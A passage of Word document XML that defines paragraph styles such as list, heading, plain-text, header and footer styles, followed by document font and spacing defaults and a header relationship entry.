    <w:name w:val="Heart List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Implies List">
    <w:name w:val="Implies List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List Paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lower Case List">
    <w:name w:val="Lower Case List"/>
    <w:basedOn w:val="Numbered List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lower Roman List">
    <w:name w:val="Lower Roman List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="No List">
    <w:name w:val="No List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:docDefaults>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:pPrDefault>
    <w:rPrDefault>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:rPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:styleId="Normal Table">
    <w:name w:val="Normal Table"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Numbered Heading 1">
    <w:name w:val="Numbered Heading 1"/>
    <w:basedOn w:val="Heading 1"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Numbered Heading 2">
    <w:name w:val="Numbered Heading 2"/>
    <w:basedOn w:val="Heading 2"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Numbered Heading 3">
    <w:name w:val="Numbered Heading 3"/>
    <w:basedOn w:val="Heading 3"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Numbered List">
    <w:name w:val="Numbered List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Plain Text">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Section Heading">
    <w:name w:val="Section Heading"/>
    <w:basedOn w:val="Numbered Heading 1"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Square List">
    <w:name w:val="Square List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Star List">
    <w:name w:val="Star List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tick List">
    <w:name w:val="Tick List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Triangle List">
    <w:name w:val="Triangle List"/>
    <w:basedOn w:val="_Normal"/>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paragraph" w:styleId="_Normal">
    <w:name w:val="_Normal"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="header">
    <w:name w:val="header"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>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hId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header0.xml"/></Relationships>
</file>